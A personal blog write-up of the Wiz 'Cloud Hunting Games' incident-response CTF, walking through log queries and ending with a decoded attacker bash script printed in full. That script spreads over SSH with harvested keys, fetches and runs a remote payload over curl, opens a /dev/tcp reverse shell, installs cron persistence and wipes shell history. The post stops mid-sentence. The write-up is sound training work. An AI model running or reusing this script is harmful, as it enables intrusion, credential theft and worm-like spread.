Background

Once a month my department has a “brain day”. This is a day where employees are supposed to step away from normal work and use the time to learn something new, study for an upcoming certification, or finally tackle that long list of technical blog posts that we have been meaning to check out…

In late April, Wiz started teasing about a new CTF challenge they were cooking up. In early May, they finally formally announced it via this blog post: https://www.wiz.io/blog/the-cloud-hunting-games-ctf-challenge. Since this one covers IR and cloud and the last CTF I did from Wiz (https://eksclustergames.com/, will eventually write a blog post about this one) was a blast, I was excited to dive into this one. Before diving into the challenges, you are shown an email from “FizzShadows” noting that they have your company’s data and you most pay them some bitcoin in order for them to not disclose your data.

CTF Name: Cloud Hunting Games

URL: https://www.cloudhuntinggames.com/

Username: volmeringd

# of Challenges: 5

Challenge 1:

The first challenge starts by giving you a small blurb about how your company’s secret recipes are stored in s3 and noting your company has s3 data event logging enabled. It also gives you a text editor of sorts where you can run sql queries. The data you are queryying agasint is the s3 access logs. Note, if sql queries aren’t your jam you can run the default query to get all results, click on the “clomuns” button and at the bottom there is a “Download as CSV” button. It has been a minute since I did sql, so I figured I would use this as a chance to brush off my dust a bit (also leverage my good old friend Copilot).

So based off the description, we are assuming the bad actor obtained files (typically a GetObject event in AWS) and it is a recipe of some sort… So I tried a quick and dirty query like this:

SELECT * FROM s3_data_events WHERE EventName LIKE ‘GetObject’ AND Path LIKE ‘%recipe%’

Challenge 2:

This challenge, they want you to go a step deeper and figure out what IAM user used the S3Reader/drinks assume role. Since we know we want an “AssumeRole” event and the request parameter includes the role you assume into and we want one that includes drinks, we can do this:

SELECT*FROMcloudtrailWHEREEventNameLIKE‘AssumeRole’ANDrequestParametersLIKE‘%drinks%’

Challenge 3:

With this challenge, that want to know what machine the user compromised and used for lateral movement. This one took me some time. I went down a number of paths. I first started with seeing what else Moe did… He assumed into another session posing as jack becker. I then looked at Jack’s activity but that didn’t yield much. I then decided to go a more brute force route… I got a unique count of all event names:

SELECT EventName, COUNT(*) AS event_count
FROM cloudtrail
GROUP BY EventName
ORDER BY event_count DESC;

From there, I started going through the event names to see which ones stood out as potential lateral movement. The AssumeRole and UpdateFunctions20150331v2 stood out to me. Looking through the AssumeRole stuff, nothing caught my eye in terms of things to further investigate. The UpdateFunctions20150331v2 was interesting to me because I have read quite a few reports of lambda being a vector for persesitance and/or lateral movement. Looking at that event in particular:

SELECT * FROM cloudtrail WHERE EventName LIKE ‘UpdateFunctionCode20150331v2’

We see that in the “responseElements” column, the lambda being updated is claled “credsrotator”… Sounds like lateral movement if I have ever heard it before.

The machine id is located in the userIdentity_ARN field: arn:aws:sts::509843726190:assumed-role/lambdaWorker/i-0a44002eec2f16c25

Challenge 4:

We now move from sql queries to an actual box. I was elated until I figured out how limited of functionality the box actually had. We are asked to find the IP of the workoad that was the intial entry point into the org. Trying to do normal checks of network based things kept resulting in “XX: command not found”. So then I figured I would look at /var/log… Well var log appears to be empty, except for a hidden file:

Challenge 5:

The last challenge, you are tasked with deleting the secret recipe off the attacker’s server. The blurb notes the attacker is “persistent” but this goes right over my head. I poked around the box for awhile but ended up getting stuck. I used 2 points to get a hint and quickly became a sad panda because I realized I didn’t even think to check cron related things… My hint pointed me to cronttabs. Checking for crontab files yields one file:

Cating that file we are directed to another file /var/lib/postgresql/data/pg_sched:

Cating that file, we get a lovely giant base64 encoded string. If we base64 decode that string we get the following code:

#!/bin/bash

# List of interesting policies

VULNERABLE_POLICIES=(“AdministratorAccess” “PowerUserAccess” “AmazonS3FullAccess” “IAMFullAccess” “AWSLambdaFullAccess” “AWSLambda_FullAccess”)

SERVER=“34.118.239.100”

PORT=4444

USERNAME=“FizzShadows_1”

PASSWORD=“Gx27pQwz92Rk”

CREDENTIALS_FILE=“/tmp/c”

SCRIPT_PATH=“$(cd — “$(dirname — “${BASH_SOURCE[0]}”)” &>/dev/null && pwd)/$(basename — “${BASH_SOURCE[0]}”)”

# Check if a command exists

check_command() {

    if ! command -v “$1“ &> /dev/null; then

        install_dependency “$1“

    fi

}

# Install missing dependencies

install_dependency() {

    local package=“$1“

    if [[ “$package“ == “curl” ]]; then

        apt-get install curl -y &> /dev/null

                yum install curl -y &> /dev/null

    elif [[ “$package“ == “unzip” ]]; then

        apt-get install unzip -y &> /dev/null

                yum install unzip -y &> /dev/null

    elif [[ “$package“ == “aws” ]]; then

        install_aws_cli

    fi

}

# Install AWS CLI locally

install_aws_cli() {

    mkdir -p “$HOME/.aws-cli”

    curl -s “https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip” -o “$HOME/.aws-cli/awscliv2.zip”

    unzip -q “$HOME/.aws-cli/awscliv2.zip” -d “$HOME/.aws-cli/”

    “$HOME/.aws-cli/aws/install” –install-dir “$HOME/.aws-cli/bin” –bin-dir “$HOME/.aws-cli/bin”

    # Add AWS CLI to PATH

    export PATH=“$HOME/.aws-cli/bin:$PATH“

    echo ‘export PATH=”$HOME/.aws-cli/bin:$PATH”‘ >> “$HOME/.bashrc”

}

# Try to spread

spread_ssh() {

    find_and_execute() {

        local KEYS=$(find ~/ /root /home -maxdepth 5 -name ‘id_rsa*’ | grep -vw pub;

                     grep IdentityFile ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk ‘{print $2}’;

                     find ~/ /root /home -maxdepth 5 -name ‘*.pem’ | sort -u)

        local HOSTS=$(grep HostName ~/.ssh/config /home/*/.ssh/config /root/.ssh/config 2>/dev/null | awk ‘{print $2}’;

                      grep -E “(ssh|scp)” ~/.bash_history /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -oP “([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b”;

                      grep -oP “([0-9]{1,3}\.){3}[0-9]{1,3}|\b(?:[a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}\b” ~/*/.ssh/known_hosts /home/*/.ssh/known_hosts /root/.ssh/known_hosts 2>/dev/null |

                      grep -vw 127.0.0.1 | sort -u)

        local USERS=$(echo “root”;

                      find ~/ /root /home -maxdepth 2 -name ‘.ssh’ | xargs -I {} find {} -name ‘id_rsa’ | awk -F‘/’ ‘{print $3}’ | grep -v “.ssh” | sort -u)

       for key in $KEYS; do

            chmod 400 “$key“

            for user in $USERS; do

              echo “$user“

                   for host in $HOSTS; do

                     ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i “$key“ “$user@$host“ “(curl -u $USERNAME:$PASSWORD -o /dev/shm/controller http://$SERVER/files/controller && bash /dev/shm/controller)”

                done

            done

        done

    }

    find_and_execute

}

create_persistence() {

(crontab -l 2>/dev/null; echo “0 0 * * * bash $SCRIPT_PATH“) | crontab –

}

create_shell () {

    echo “Creating a reverse shell”

    /bin/bash -i >& /dev/tcp/”$SERVER“/”$PORT“ 0>&1

}

# Check role policies

check_role_vuln() {

    local ROLE_NAME=$(aws sts get-caller-identity –query “Arn” –output text | awk -F‘/’ ‘{print $2}’)

    # List attached policies for the given role

    attached_policies=$(aws iam list-attached-role-policies –role-name “$ROLE_NAME“ –query ‘AttachedPolicies[*].PolicyName’ –output text)

    # Check if the user has IAM permissions to list policies

    if [[ $? -eq 0 ]]; then

        # If the user has IAM permissions, check attached policies

        attached_policies_array=($attached_policies)

        for policy in “${attached_policies_array[@]}”; do

            for vuln_policy in “${VULNERABLE_POLICIES[@]}”; do

                if [[ “$policy“ == “$vuln_policy“ ]]; then

                    return 0

                fi

            done

        done

    else

        aws s3 ls

        if [[ $? -eq 0 ]]; then

            return 0

        else

            aws lambda list-functions

            if [[ $? -eq 0 ]]; then

                return 0

            else

                return 1

            fi

        fi

    fi

}

# Check required dependencies

check_command “curl”

check_command “unzip”

check_command “aws”

check_role_vuln

if [[ $? -eq 0 ]]; then

        create_shell

else

        create_persistence

        spread_ssh

        cat /dev/null > ~/.bash_history

fi

Reading through the code, we have credentials and an IP at the top and some type of webserver on the IP with a /files page.

Putting that information togehter: